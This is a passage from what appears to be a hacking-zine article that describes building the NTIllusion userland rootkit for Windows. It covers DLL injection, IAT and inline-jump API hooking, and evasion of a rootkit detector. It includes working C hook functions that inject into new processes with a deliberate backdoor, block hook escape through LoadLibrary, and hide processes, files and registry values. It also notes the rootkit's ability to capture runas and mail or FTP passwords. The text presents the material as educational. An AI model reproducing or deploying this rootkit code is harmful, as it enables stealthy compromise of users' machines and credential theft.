+hooking modules enumeration APIs inside the memory space of each process
+able to reveal the rootkit. However I show how this is possible to do this
+by dealing directly with undocumented structures pointed by the Process
+Environment Block. Once this has been done, there's not need to worry
+about subsequent detection. To test this method I downloaded a rootkit
+detector, [VICE], and scaned my system. With no rootkit loaded, VICE
+produced most of the time some false positive for standart DLLs (kernel32/
+ntdll/...). Once the rootkit was loaded and using this technique, there
+was no noticable change and VICE was still accusing some system DLLs to be
+rootkits as before but there was no record about kNTIllusion.dll that was
+however doing the job efficiently. 
+
+
+
+-------[ 2. Code Injection and interception
+The goal of this section is to allow a process to replace the functions
+of another. This involves getting control of the target process, then
+to replace parts of it's memory carefully. Let's begin with code injection.
+So altering the behavior of a process requires to break into it's memory 
+space in order to execute some code to do the job. Fortunately, windows 
+perfors checks to prevent an application to read or write memory of an 
+other application without its permission. Nevertheless the windows 
+programmers included several ways to bypass the native inter-process 
+protection so patching other processes' memory at runtime is a true 
+possibility. The first step in accessing a running process is done trough 
+the OpenProcess API. If the application possesses the correct security 
+permissions, the function returns a handle to deal with the process, in 
+the other case, it denies access. By triggering a proper privilege, a user 
+may get access to a privilegded process as we'll see later. In Windows NT, 
+a privilege is some sort of flag granted to a user that allows the user to
+override what would normally be a restriction to some part of the
+operating system. This is the bright side. But unfortunately there is
+also a seamy side. In fact there's multiple ways to break into the memory
+space of a running process and running hostile code in it, by using 
+documented functions of the windows API. The following methods have
+already been covered in the past so I will only give an overview.
+
+
+-------[ 2.1. System Hooks
+The most known technique uses the SetWindowsHookEx function which sets a 
+hook in the message event handler of a given application. When used as a 
+system hook, i.e. when the hook is set for the whole userland, by relying 
+on a code located in a dll, the operating system injects the dll into each 
+running process matching the hook type. For example, if a WH_KEYBOARD hook 
+is used and a key is pressed under notepad, the system will map the hook's 
+dll inside notepad.exe memory space. Easy as ABC... For more information
+on the topic, see [HOOKS] and [MSDN_HOOKS]. Hooks are most of the time
+used for developping pacthes or automating user manipulations but the
+following method is from far more eloquent.
+
+
+-------[ 2.2. CreateRemoteThread
+Another gift for windows coders is the CreateRemoteThread API. As its name 
+points out, it allows the creation of a thread inside the memory space of 
+a target process. This is explained by Robert Kuster in [3WAYS]. 
+When targeting a process running in a more privileged context, a rootkit
+may acquire God Power by activating the SeDebugPrivilege. For more
+information see the rootkit code. [NTillusion rootkit]
+Although this method seems interesting, it is from far widespread and easy 
+to defeat using a security driver. See also [REMOTETH] for other info.
+More over, any injected DLL with this method will be easily noticed by
+any program performing basic module enumeration. Section 4.7 offers a 
+solution to this problem, while the following section presents a less
+known way to run code inside a target process.
+
+
+-------[ 2.3. Manipulating thread's context
+CreateRemoteThread isn't the only debugging API that may be used to 
+execute code into a target process. The principle of the following 
+technique is to reroute a program's execution flow to malicious code 
+injected in the program's memory space. This involves three steps. 
+First, the injector chooses a thread of this process and suspends it. 
+Then, it injects the code to be executed in the target process memory as 
+before, using VirtualAllocEx/WriteProcessMemory, and changes a few 
+addresses due to changes in memory position. Next, it sets the address of 
+the next instruction to be executed for this thread (eip register) to 
+point to the injected code and restarts the thread. The injected code is 
+then executed in the remote process. Finally it arranges for a jump to the 
+next instruction that should have been executed if the program had 
+followed its normal course, in order to resume its activity as soon as 
+possible. The idea of manipulating the thread's context is exposed in
+[LSD]. Other methods also exist to trigger the load of a given DLL inside
+the memory space of a target process.
+By design, the HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\Current 
+Version\Windows\AppInit_DLLs key gathers the DLL to be loaded by the 
+system inside each process relying on user32.dll. Added to that come the 
+BHO, standing for browser help objects, that act as plugins for web-
+browsers, enabling the load of any sort of code.
+
+But just taking over a process is not enough...
+Once the target process' memory space is under control, it's possible
+to replace its own functions by provided ones.
+Code interception routines are critical since they had to meet efficiency 
+and speed requirements. The methods presented in this section have their 
+own advantages and drawbacks. As for the injection techniques, there's 
+more than one way to do the job. The goal of the methods is to redirect 
+another program's function when it is loaded in memory. For the target 
+program, everything takes place as if it had called the desired functions 
+as usual. But in fact the call is redirected to the replacement API.
+Some methods of API interception are based on features intentionally 
+provided by the designers of the PE format to simplify the loader's task 
+when a module is mapped into memory. The function redirection takes place 
+once the code we inject into the target process is executed. To understand 
+how these methods work, a thorough understanding of the PE format is 
+needed; see [PE] and hang on with courage, the following methods are 
+useful.
+
+
+-------[ 2.4. Redirecting the Import Address Table
+After injecting our code into the application's memory space, it is 
+possible to change its behavior. We use a technique called "API hooking" 
+which involves replacing the API by our own routines. The most common way 
+to do this is to alter the import address table of a given module.
+When a program is executed, its various zones are mapped into memory, and 
+the addresses of the functions it calls are updated according to the 
+windows version and service pack. The PE format provides a clever solution 
+to do this update, without patching every single call. When you compile 
+your program, each call to an external API is not directly pointing to the 
+function's entry point in memory. It is using a jump involving a dword 
+pointer, whose address is among a table called the Import Address Table 
+(IAT), since it contains the address of each imported function. At load 
+time, the loader just needs to patch each entry of the IAT to modify the 
+target of each call for all API.
+Thus, to hijack, we simply patch the IAT to make the memory point to our 
+code instead of the true entry point of the target API. In this way, we 
+have total control over the application, and any subsequent calls to that 
+function are redirected. This general idea of the technique which is
+detailed more in [IVANOV] and [UNLEASHED]. But hooking at IAT level is
+from far a non secure way. Undirect Call may be missed. To prevent this,
+there's only one solution... inserting an unconditional jump!
+
+
+-------[ 2.5. Inserting an unconditional jump (jmp)
+This technique involves modifying the machine code of a given API so that 
+it executes an unconditional jump to a replacement function. Thus any call 
+ direct or indirect  to the hooked API will inevitably be redirected to 
+the new function. This is the type of function redirection used by the 
+Microsoft Detours Library [DETOURS]. In theory, redirection by inserting 
+of an unconditional jump is simple: you simply locate the entry point of 
+the API to be hijacked an insert an unconditional jump to the new 
+function. This technique make us lose the ability to call the original 
+API, however; there are two ways to work around that inconvenience.
+The first is the method used in the famous hxdef rootkit, or Hacker 
+Defender which is now open source [HKDEF_RTK]. The idea is to insert an 
+unconditional jump while saving the overwritten instruction in a buffer 
+zone. When the original API must be called, the redirection engine 
+restores the real API, calls it, then repositions the hook. The problem 
+with this technique is that it is possible to lose the hook. If things go 
+wrong, there is a chance that the hook will not be restored when exiting 
+the API. An even bigger risk is that another thread of the application may 
+access the API between the time it is restored and the time when the hook 
+is repositioned. Thus, as its creator Holy_Father knows, there is a chance 
+that some calls may be lost when using this method.
+
+However, there is another solution for calling the original API. It 
+involves creating a buffer containing the original version of the API's 
+modified memory zone, followed by a jump to and address located 5 bytes 
+after the start of the zone. This jump allows to continue the execution of 
+the original function just after the unconditional jump that performs the 
+redirection to the replacement function. It seems simple?
+
+No, it isn't. One detail that I voluntarily left out until now: the 
+problem of disassembling instructions. In machine code, instructions have
+a variable length. How can we write an unconditional five-byte jump while
+being sure not to damage the target code ("cutting an instruction in
+half")? The answer is simple: in most cases we just use a basic 
+disassembly engine. It allows to recover as many complete instructions as
+required to reach the size of five bytes, i.e. the area just big enough
+the insert the unconditional jump. The useful redirection engine used in
+the rootkit is the one created by Z0MbiE (see [ZOMBIE2]).
+This hooking method, somewhat particular has been covered by Holy_Father.
+Refer to [HKDEF] if you are interested.
+Hum, That's all folks about prerequisite. Now we're going to consider how
+to build a win32 rootkit using these techniques. Le'ts play!
+
+
+
+-------[ 3. User land take over
+-------[ 3.1 User land vs Kernel land rootkits
+Most of the time, to achieve their aim kernel land rootkits simply replace 
+the native API with some of their own by overwriting entries in the 
+Service Descriptor Table (SDT). Against a normal windows system, they 
+don't have to worry about persistence as once the hook is set, it will 
+hijack all subsequent calls for all processes. This isn't the case for 
+win32 ring 3 rootkits, acting at user level. In fact, the hook isn't 
+global as for kernel ones, and the rootkit must run its code inside each 
+process able to reveal its presence.
+Some decide to hook all processes running on the machine including those 
+of the SYSTEM groups. It requires advanced injection techniques, hooking 
+methods and to target API at very low level. 
+Let me explain. Consider we want some directories not to be noticed when 
+browsing the hard drive using explorer. A quick look at explorer.exe's 
+Import Table reveals that it is using FindFirstFileA/W and FindNextFileA/W 
+So we may hook these functions. At first it seems tedious to hook all 
+these functions rather than going a level under. Yeah, these functions 
+rely on the native API ntdll.ZwQueryDirectoryFile, it would be easier to 
+hook this one instead. This is true for a given version of windows. But 
+this isn't ideal for compatibility. The more low level the functions are, 
+the more they're subject to change. Added to that, it is sometimes 
+undocumented. So on the one hand, there's hijacking at low level, more 
+accurate but somewhat hazardous, and on the other hand, hijacking at high 
+level, less accurate, but from far simpler to set up.
+
+NTillusion hijacks API at high level since I never designed it to reside 
+into system processes. Each choice has a bright side and a seamy side.
+The following points describe the restrictions I wanted the rootkit to fit 
+and the constraints windows imposes to processes.
+
+
+-------[ 3.2 Restrictions...
+The rootkit is made to be able to perform its stealth for the current user 
+on the local machine. This is especially designed for cases where 
+administrator level is unreachable for some reason. This shows that 
+getting root is sometimes not necessary to be lurking. It represents a 
+true threat in this case, since windows users have the bad habit to set 
+their maximum privilege on their account instead of triggering it using 
+runas to become admin only when needed. So, if the user is not currently 
+admin, he probably isn't at all, so a user land rootkit will perfectly do 
+the job. Otherwise, it's time to go kernel mode.
+Thus, the rootkit is designed to only require privileges of the current 
+user to become unseen to its eyes, whether this is an admin or not. Then 
+it starts waiting for passwords collected by users using the runas method, 
+allowing privilege escalation. It may also spy web traffic to dynamically 
+grab pop3/ftp passwords on the fly. This is possible but a little bit too 
+vicious...
+
+
+-------[ 3.3 ...and constraints
+As you should now know, windows maintains a native inter-process 
+protection so a process won't access another if this one doesn't belong to 
+its group or does not present the administrator nor debug privilege. So 
+the rootkit will be restrained to affect processes of the current user. 
+Contrariwise, if it got admin privilege, it may add itself to the 
+HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run key and 
+hide its presence, being then active for all users on the machine.
+Due to the rootkit architecture, privileged processes will be able to see 
+the system as it really is. So remote administration may reveal the 
+rootkit, as much as FTP or HTTP servers running as services. The solution 
+of this problem is to affect also system processes but the task is 
+somewhat desperate and too considerable to just play the game of cat and 
+mouse.
+
+
+-------[ 3.4 Setting a global hook to take over userland
+To be efficient, the rootkit must run under all visible applications that 
+may reveal unwanted presence. Performing an injection try for each running 
+process when the rootkit loads is not a good idea since it won't affect 
+processes that would be run later. A perfect way to achieve this is to set 
+a system wide hook, using SetWindowsHookEx for WH_CBT events. Therefore, 
+the rootkit's dll will be injected into all running graphical processes, 
+as soon, as they appear on screen. Unfortunately, the WH_CBT concerns only 
+processes using user32.dll, therefore it won't affect some console 
+programs. This is the case of windows cmd, netstat, and so on. Thereby, 
+the rootkit must also affect processes so that it will be notified and 
+injected when a process creation is about to be done. This is achieved by 
+hooking the CreateProcessW function into all injected processes. This way, 
+the rootkit will be running inside any newly created process. The 
+CreateProcessW replacement and the system hook are complementary methods. 
+This combination perfectly covers all situations : the execution of a 
+graphical or console process from explorer, the taskmanager or any other 
+application. It also has the advantage to inject the rootkit into the 
+taskmanager when the user triggers Ctrl+Alt+Del. In this case, the 
+taskmanager is created by winlogon which isn't hijacked by the rootkit. 
+But the system hook is injected into as soon as it is created, since it is 
+a graphical process. To prevent a process from being injected twice, the 
+rootkit modifies pDosHeader->e_csum to be equal to NTI_SIGNATURE. When the 
+Dll is loaded it first checks the presence of this signature and exits 
+properly if needed. This is only a safety since a check is performed in 
+DllMain to be sure that the reason DllMain is called matches 
+DLL_PROCESS_ATTACH. This event only triggers when the DLL is first mapped 
+inside the memory space of the application, while subsequent calls to 
+LoadLibrary will only increase load counter for this module and be marked 
+as DLL_THREAD_ATTACH.
+
+The following code is the CreateProcessW replacement of the NTIllusion 
+rootkit. It contains a backdoor by design: if the application name or its 
+command line contains RTK_FILE_CHAR, the process is not hooked, thus 
+allowing some programs not to be tricked by the rootkit. This is useful to 
+launch hidden processes from windows shell that performs a search before 
+delegating the creation of the process to CreateProcessW.
+
+----------------------   EXAMPLE 1   -----------------------------
+BOOL WINAPI MyCreateProcessW(LPCTSTR lpApplicationName, 
+LPTSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes,
+LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, 
+DWORD dwCreationFlags, LPVOID lpEnvironment, 
+LPCTSTR lpCurrentDirectory, LPSTARTUPINFO lpStartupInfo, 
+LPPROCESS_INFORMATION lpProcessInformation)
+{
+	int bResult, bInject=1;
+	char msg[1024], cmdline[256], appname[256];
+	
+
+/* Resolve CreateProcessW function address if it hasn't been filled 
+by IAT hijack. This happens when the function isn't imported at IAT 
+level but resolved at runtime using GetProcAddresss. */
+
+	if(!fCreateProcessW) 
+	{
+        fCreateProcessW = (FARPROC) 
+                fGetProcAddress(GetModuleHandle("kernel32.dll"),
+                                "CreateProcessW");
+		if(!fCreateProcessW) return 0;
+	}
+
+	/* Clear parameters */
+	my_memset(msg, 0, 1024);
+	my_memset(cmdline, 0, 256);
+	my_memset(appname, 0, 256);
+
+	/* Convert application name and command line from unicode : */
+	WideCharToMultiByte(CP_ACP, 0,(const unsigned short *)
+	  lpApplicationName, -1, appname, 255,NULL, NULL);
+	WideCharToMultiByte(CP_ACP, 0,(const unsigned short *)
+	  lpCommandLine, -1, cmdline, 255,NULL, NULL);
+
+	/* Call original function first, in suspended mode */
+	bResult = (int) fCreateProcessW((const unsigned short *)
+	                lpApplicationName,
+	                (unsigned short *)lpCommandLine, lpProcessAttributes, 
+	                lpThreadAttributes, bInheritHandles, CREATE_SUSPENDED 
+	                /*dwCreationFlags*/, lpEnvironment, 
+                    (const unsigned short*)lpCurrentDirectory, 
+                    (struct _STARTUPINFOW *)lpStartupInfo, 
+	                lpProcessInformation);
+	
+	/* inject the created process if its name & command line don't
+   contain RTK_FILE_CHAR */
+	if(bResult)
+	{
+		if( 
+		(lpCommandLine && strstr((char*)cmdline,(char*)RTK_FILE_CHAR)) || 
+		(lpApplicationName && strstr((char*)appname,(char*)RTK_FILE_CHAR)) 
+          )
+        {
+			OutputString("\n[i] CreateProcessW: Giving true sight to 
+			process '%s'...\n", (char*)appname);
+			WakeUpProcess(lpProcessInformation->dwProcessId);
+			bInject = 0;
+		}
+		if(bInject) 
+		    InjectDll(lpProcessInformation->hProcess,
+		              (char*)kNTIDllPath);
+
+		CloseHandle(lpProcessInformation->hProcess);
+		CloseHandle(lpProcessInformation->hThread); 
+		
+	}
+	return bResult;
+}
+---------------------- END EXAMPLE 1 -----------------------------
+
+Note that the child process is created in suspended mode, then injected by 
+the Dll using CreateRemoteThread. The DLL hook function next wakes the 
+current process up by resuming all its threads. This assures that the 
+process has not executed a single line of its own code during the hijack 
+time.
+
+-------[ 3.5 Local application take over
+Being injected into all processes in the system is the first step to take 
+the ownership of user land. When being able to act anywhere, it must keep 
+its control and prevent any newly loaded module to escape the function 
+hooking that has been set in order to hide unwanted things. So it is 
+strongly recommended to filter calls to LoadLibraryA/W/Ex in order to hook 
+modules as soon as they are loaded into memory. The following function 
+demonstrates how to replace LoadLibraryA in order to prevent hooking 
+escape.
+
+----------------------   EXAMPLE 2   -----------------------------
+/* LoadLibrary : prevent a process from escaping hijack by loading a new 
+dll and calling one of its functions */
+HINSTANCE WINAPI MyLoadLibrary( LPCTSTR lpLibFileName )
+{
+	HINSTANCE hInst	= NULL;	/* DLL handle (by LoadLibrary)*/
+	HMODULE   hMod	= NULL;	/* DLL handle (by GetModuleHandle) */
+	char	 *lDll = NULL;		/* dll path in lower case */
+	
+	/* get module handle */
+	hMod = GetModuleHandle(lpLibFileName);
+
+	/* Load module */
+	hInst = (HINSTANCE) fLoadLibrary(lpLibFileName);
+	
+
+	/* Everything went ok? */
+	if(hInst) 
+	{
+		
+		/*  If the DLL was already loaded, don't set hooks a second
+		    time */ 
+		if(hMod==NULL)
+		{
+			/* Duplicate Dll path to perform lower case comparison*/
+			lDll = _strdup( (char*)lpLibFileName );
+			if(!lDll)
+				goto end;
+			/* Convert it to lower case */
+			_strlwr(lDll);
+			
+			/* Call hook function */
+			SetUpHooks((int)NTI_ON_NEW_DLL, (char*)lDll);
+			
+			free(lDll);
+		}		
+	}
+
+end:
+  return hInst;
+}
+---------------------- END EXAMPLE 2 -----------------------------
+
+As the hijacking method used is entry point rewriting, we must check that 
+the DLL has not been yet loaded before performing the hooking. Otherwise, 
+this may trigger an infinite loop when calling the original function. The 
+job is partially done by SetUpHooks that will perform the hooking on 
+already loaded module only at program startup.
+
+About GetProcAddress:
+At first NTillusion rootkit was using an IAT hijacking method in order to 
+replace file, process, registry and network APIs to perform its stealth. 
+Under winXP, all worked perfectly. But when I tested it under win2000 I 
+noticed a unusual behaviour in explorer's IAT. In fact, the loader doesn't 
+fill the IAT correctly for a few functions such as CreateProcessW, so the 
+address written doesn't always correspond to the API entry point 
+[EXPLORIAT]. Scanning the IAT looking for API name instead of it's address 
+does not solve the problem. It seems that explorer is performing something 
+strange... So I moved from an IAT hijacking engine needing to hook 
+GetProcAddress in order to prevent hook escape, to the unconditional jump 
+insertion that does not need to filter calls to this API. Anyway, you can 
+try to hijack GetProcAddress and send the details of each call to debug 
+output. The amount of GetProcAddress calls performed by explorer is 
+amazing and its study, instructive.
+
+
+
+-------[ 4. Replacement functions
+Here comes the most pleasant part of the NTIllusion rootkit, i.e. the core 
+of the replacement functions.
+
+
+-------[ 4.1. Process hiding
+The main target when speaking about process hiding is the taskmanager. 
+Studying its Import Table reveals that it performs direct calls to 
+ntdll.NtQuerySystemInformation, so this time, hijacking API at higher 
+level is useless and the situation leaves no choice. The role of the 
+replacement function is to hide the presence of each process whose image 
+name begins with RTK_PROCESS_CHAR string. Retrieving the processes list is 
+done through a call to the [NtQuerySystemInformation] API.
+
+NTSTATUS NtQuerySystemInformation(
+  SYSTEM_INFORMATION_CLASS SystemInformationClass,
+  PVOID SystemInformation,
+  ULONG SystemInformationLength,
+  PULONG ReturnLength
+);
+
+The NtQuerySystemInformation function retrieves various kinds of system 
+information. When specifying SystemInformationClass to be equal to 
+SystemProcessInformation, the API returns an array of SYSTEM_PROCESS_
+INFORMATION structures, one for each process running in the system. These 
+structures contain information about the resource usage of each process, 
+including the number of handles used by the process, the peak page-file 
+usage, and the number of memory pages that the process has allocated, as 
+described in the MSDN. The function returns an array of 
+SYSTEM_PROCESS_INFORMATION structures though the SystemInformation 
+parameter. 
+
+Each structure has the following layout: 
+typedef struct _SYSTEM_PROCESS_INFORMATION 
+{ 
+    DWORD          NextEntryDelta; 
+    DWORD          dThreadCount; 
+    DWORD          dReserved01; 
+    DWORD          dReserved02; 
+    DWORD          dReserved03; 
+    DWORD          dReserved04; 
+    DWORD          dReserved05; 
+    DWORD          dReserved06; 
+    FILETIME       ftCreateTime;	/* relative to 01-01-1601 */ 
+    FILETIME       ftUserTime;		/* 100 nsec units */ 
+    FILETIME       ftKernelTime;	/* 100 nsec units */ 
+    UNICODE_STRING ProcessName; 
+    DWORD          BasePriority; 
+    DWORD          dUniqueProcessId; 
+    DWORD          dParentProcessID; 
+    DWORD          dHandleCount; 
+    DWORD          dReserved07; 
+    DWORD          dReserved08; 
+    DWORD          VmCounters; 
+    DWORD          dCommitCharge; 
+    SYSTEM_THREAD_INFORMATION  ThreadInfos[1];
+} SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION;
+Hiding a process is possible by playing with the NextEntryDelta member of
+the structure, which represents an offset to the next SYSTEM_PROCESS_
+INFORMATION entry. The end of the list is marked by a NextEntryDelta equal
+to zero.
+
+----------------------   EXAMPLE 3   -----------------------------
+/*		MyNtQuerySystemInformation : install a hook at system query 
+level to prevent _nti* processes from being shown.
+Thanks to R-e-d for this function released in rkNT rootkit.
+(error checks stripped)
+*/
+DWORD WINAPI MyNtQuerySystemInformation(DWORD SystemInformationClass, 
+PVOID SystemInformation, ULONG SystemInformationLength, 
+								PULONG ReturnLength)
+{
+	PSYSTEM_PROCESS_INFORMATION pSpiCurrent, pSpiPrec;
+	char *pname = NULL;
+	DWORD rc;	
+
+	/* 1st of all, get the return value of the function */
+	rc = fNtQuerySystemInformation(SystemInformationClass, 
+	      SystemInformation, SystemInformationLength, ReturnLength);
+	
+	/* if sucessful, perform sorting */
+	if (rc == STATUS_SUCCESS)
+	{
+		/* system info */
+		switch (SystemInformationClass)
+		{
+			/* process list */
+		case SystemProcessInformation:			
+			pSpiCurrent = pSpiPrec = (PSYSTEM_PROCESS_INFORMATION) 
+			                           SystemInformation;
+			
+			while (1)
+			{	
+				/* alloc memory to save process name in AINSI 
+				   8bits string charset */
+				pname = (char *) GlobalAlloc(GMEM_ZEROINIT, 
+				    pSpiCurrent->ProcessName.Length + 2);
+								
+				/* Convert unicode string to ainsi */
+				WideCharToMultiByte(CP_ACP, 0, 
+				    pSpiCurrent->ProcessName.Buffer, 
+				    pSpiCurrent->ProcessName.Length + 1, 
+				    pname, pSpiCurrent->ProcessName.Length + 1,
+				    NULL, NULL);
+
+				    /* if "hidden" process*/
+				if(!_strnicmp((char*)pname, RTK_PROCESS_CHAR, 
+				    strlen(RTK_PROCESS_CHAR))) 
+				{
+					/* First process */
+					if (pSpiCurrent->NextEntryDelta == 0) 
+					{							
+					    pSpiPrec->NextEntryDelta = 0;
+						break;
+					}
+					else 
+					{
+						pSpiPrec->NextEntryDelta += 
+						      pSpiCurrent->NextEntryDelta;
+						
+						pSpiCurrent = 
+						(PSYSTEM_PROCESS_INFORMATION) ((PCHAR) 
+						pSpiCurrent + 
+						pSpiCurrent->NextEntryDelta);
+					}
+				}
+				else
+				{
+					if (pSpiCurrent->NextEntryDelta == 0) break;
+					pSpiPrec = pSpiCurrent;
+					
+					/* Walk the list */
+					pSpiCurrent = (PSYSTEM_PROCESS_INFORMATION) 
+					((PCHAR) pSpiCurrent + 
+					pSpiCurrent->NextEntryDelta);
+				}
+				
+				GlobalFree(pname);
+			} /* /while */
+			break;
+		} /* /switch */
+	} /* /if */
+	
+	return (rc);
+}
+---------------------- END EXAMPLE 3 -----------------------------
+
+Previously I said that targeting NtQuerySystemInformation was the only 
+solution. This is not entirely true. It's contrariwise sure that hooking 
+Process32First/Next won't help but it's still possible to do otherwise. 
+At first I chose to hook SendMessage, therefore hiding at ListBox control 
+level. This is a very specific approach to the problem and is 
+undocumented. Spying the behavior of the taskmanager on process creation 
+with Spy++ shows that it uses the row telling about system idling process 
+and changes its name to show the newly created process by sending a 
+LVM_SETITEMTEXT message. So, first it overwrites the content of this 
+ListBox item's line, and then add a new "Idle process" line by sending a 
+LVM_INSERTITEMW message. Filtering these two types of message let us 
+control what the taskmanager shows. Not very professional but efficient.
+
+The following function replaces SendMessageW inside the task manager to 
+prevent the program to send messages related to hidden process.
+
+----------------------   EXAMPLE 4   -----------------------------
+/* MySendMessageW : install a hook at display level (that is to say at 
+ListBox level) to prevent _* processes from being shown */
+LRESULT WINAPI MySendMessageW(
+HWND hWnd,		/* handle of destination window */
+UINT Msg,		/* message to send */
+WPARAM wParam,	/* first message parameter  */
+LPARAM lParam)	/* second message parameter */
+{
+	LPLVITEM pit; /* simple pointer to a LVITEM structure */
+	
+	/* Filter events */
+	if(	Msg==LVM_SETITEM || Msg==LVM_INSERTITEMW || 
+	Msg==LVM_SETITEMTEXTW				)
+	{
+		/* If process name starts by '_', hide it*/
+		if( ((char)(pit->pszText))=='_' )
+		{
+			hWnd=Msg=wParam=lParam=NULL; 
+			return 0;
+		}
+	}
+
+	/* in the other case, just call the genuine function */
+	return fSendMessageW(hWnd,Msg,wParam,lParam);
+}
+---------------------- END EXAMPLE 1 -----------------------------
+
+This very high level hook does the job but it will only work for 
+taskmgr.exe.
+
+
+-------[ 4.2. File hiding
+Another frequently asked question is how to hide files. As explained 
+above, I choose to hook FindFirstFileA/W and FindNextFileA/W. It is from 
+far sufficient to defeat explorer view, the dir command, and all dialog 
+boxes provided by the Common Controls.
+
+According the [MSDN] the FindFirstFile function searches a directory for a 
+file or subdirectory whose name matches the specified name.
+HANDLE FindFirstFile(
+  LPCTSTR lpFileName,
+  LPWIN32_FIND_DATA lpFindFileData
+);
+
+The function takes two parameters. A null-terminated string that specifies 
+a valid directory or path and file name, which can contain wildcard 
+characters (* and ?): lpFileName, and a pointer to a WIN32_FIND_DATA 
+structure that receives information about the found file or subdirectory.
+If the function succeeds, the return value is a search handle used in a 
+subsequent call to FindNextFile or FindClose.
+If the function fails, the return value is INVALID_HANDLE_VALUE. 
+
+The FindFirstFile function is called to begin a file search. If it 
+succeed, the search may be pursued by calling FindNextFile.
+ 
+BOOL FindNextFile(
+  HANDLE hFindFile,
+  LPWIN32_FIND_DATA lpFindFileData
+);
+
+The hFindFile parameter is a handle returned by a previous call to 
+FindFirstFile or FindFirstFileEx function. Like before, the lpFindFileData 
+points to a the WIN32_FIND_DATA structure that receives information about 
+the found file or subdirectory. The structure can be used in subsequent 
+calls to FindNextFile to see the found file or directory. The function 
+succeeds if it returns nonzero.
+
+Let's have a look at the WIN32_FIND_DATA structure. The important member 
+is cFileName which is a null-terminated string that specifies the name of 
+the file.
+
+typedef struct _WIN32_FIND_DATA { 
+  DWORD dwFileAttributes; 
+  FILETIME ftCreationTime; 
+  FILETIME ftLastAccessTime; 
+  FILETIME ftLastWriteTime; 
+  DWORD nFileSizeHigh; 
+  DWORD nFileSizeLow; 
+  DWORD dwReserved0; 
+  DWORD dwReserved1; 
+  TCHAR cFileName[MAX_PATH]; 	  /* full file name */ 
+  TCHAR cAlternateFileName[14];   /* file name in the classic 8.3 
+                                     (filename.ext) file name format. */
+} WIN32_FIND_DATA,  
+*PWIN32_FIND_DATA;
+
+To perform a directory listing, an application calls FindFirstFile, and 
+then calls FindNextFile using the returned handle, until it returns zero.
+The AINSI and WIDE functions (A/W) of FindFirst/NextFile operate similarly 
+except that the Wide version performs calls to WideCharToMultiByte, in 
+order to convert unicode strings to ainsi.
+
+----------------------   EXAMPLE 5   -----------------------------
+/* MyFindFirstFileA : hides protected files from file listing 
+   (error checks stripped)*/
+HANDLE WINAPI MyFindFirstFileA(
+LPCTSTR lpFileName, 
+LPWIN32_FIND_DATA lpFindFileData)
+{
+	HANDLE hret= (HANDLE)1000;	/* return handle */
+	int go_on=1;			/* loop flag */
+
+	/* Process request */
+	hret = (HANDLE) fFindFirstFileA(lpFileName, lpFindFileData);
+
+	/* Then filter: while we get a 'hidden file', we loop */
+	while( go_on && 
+	  !_strnicmp(lpFindFileData->cFileName, RTK_FILE_CHAR, 
+	  strlen(RTK_FILE_CHAR)))
+	{
+		go_on = fFindNextFileA(hret, lpFindFileData);
+	}
+
+	/* Oops, no more files? */
+	if(!go_on)
+		return INVALID_HANDLE_VALUE;
+
+return hret;
+}
+---------------------- END EXAMPLE 5 -----------------------------
+
+And now let's replace FindNextFileA:
+----------------------   EXAMPLE 6   -----------------------------
+/* MyFindNextFileA : hides protected files from being listed */
+BOOL WINAPI MyFindNextFileA(
+  HANDLE hFindFile,
+  LPWIN32_FIND_DATA lpFindFileData 
+)
+{
+	BOOL ret;	/* return value */
+
+	/* While we get a file that should not be shown, we get another : */
+	do 
+{
+		ret = fFindNextFileA(hFindFile, lpFindFileData);
+	} while( !_strnicmp(lpFindFileData->cFileName, RTK_FILE_CHAR,
+  strlen(RTK_FILE_CHAR)) && ret!=0);
+
+/* We're out of the loop so we may check if we broke because there 
+is no more files. If it's the case, we may clear the 
+LPWIN32_FIND_DATA structure as this : 
+my_memset(lpFindFileData, 0, sizeof(LPWIN32_FIND_DATA));
+	*/
+	return ret;
+}
+---------------------- END EXAMPLE 6 -----------------------------
+
+
+-------[ 4.3. Registry
+Preventing its launch source from being detected is also an unavoidable 
+feature for this kind of rootkit. To allow registry stealth, the rootkit 
+replaces the RegEnumValueW API inside the memory space of all processes.
+The working mode of the new function is simple : if it detects itself 
+listing the content of a key that must be hidden, it returns 1 which 
+traduces an error. The only problem with this implementation is that the 
+calling process will stop asking for the listing of the content of the 
+registry key. Therefore, it will also hide subsequent keys. As the keys 
+are most of the time retrieved alphabetically, the RTK_REG_CHAR traducing 
+that the key is hidden must be starting by a character of high ASCII code 
+so that it will be retrieved last and won't bother.
+
+----------------------   EXAMPLE 7   -----------------------------
+/*  MyRegEnumValue : hide registry keys when a list is requested */
+LONG WINAPI MyRegEnumValue(
+HKEY    hKey,
+DWORD   dwIndex,
+LPWSTR  lpValueName,
+LPDWORD lpcValueName,
+LPDWORD lpReserved,  
+LPDWORD lpType,
+LPBYTE  lpData,
+LPDWORD lpcbData)
+{
+	LONG lRet; /* return value */
+	char buf[256];
+	/* Call genuine API, then process to hiding if needed */
+	lRet = fRegEnumValueW(hKey,dwIndex,lpValueName,lpcValueName,
+    lpReserved, lpType, lpData,lpcbData);
+
+	 /* Convert string from Unicode */
+	WideCharToMultiByte(CP_ACP, 0,lpValueName, -1, buf, 255,NULL, NULL);
+	
+	/* If the key must be hidden... */
+	if(!_strnicmp((char*)buf, RTK_REG_CHAR, strlen(RTK_REG_CHAR))) {
+		lRet=1; /* then return 1 (error) */
+	}
+
+    return lRet;
+}
+---------------------- END EXAMPLE 7 -----------------------------
+
+-------[ 4.4. Netstat like tools.
+Network statistics tools are from far the most vicious. There's a lot of 
+ways to request the list of TCP/UDP used ports and the behavior of the 
+same application (netstat, [TCPVIEW], [FPORT]...) varies from a version of 
+windows to another. This is especially true between NT/2000 and XP where 
+the network statistics start to include the process identifier of the 
+owner of each TCP connection. Whatever the way a process obtains these 
+statistics, some dialog has to be established with the TCP/UDP driver 
+sitting at kernel level (\Device\Tcp and \Device\Udp). This consists in 
+calls to DeviceIoControl to establish a request and receive the answer of 
+the driver. Hooking at this level is possible but from far risky and 
+nightmarish, since the structures and control codes used are undocumented 
+and change between windows versions. So the hooking has to be performed at 
+different level, depending on the quality of the requested information and 
+OS version.
+
+As the rootkit must run under 2000 and XP, we have to consider different 
+cases.
+
+-------[ 4.4.1. The case of windows 2000
+Under windows 2000 the extended API AllocateAndGetTcpExTableFromStack that 
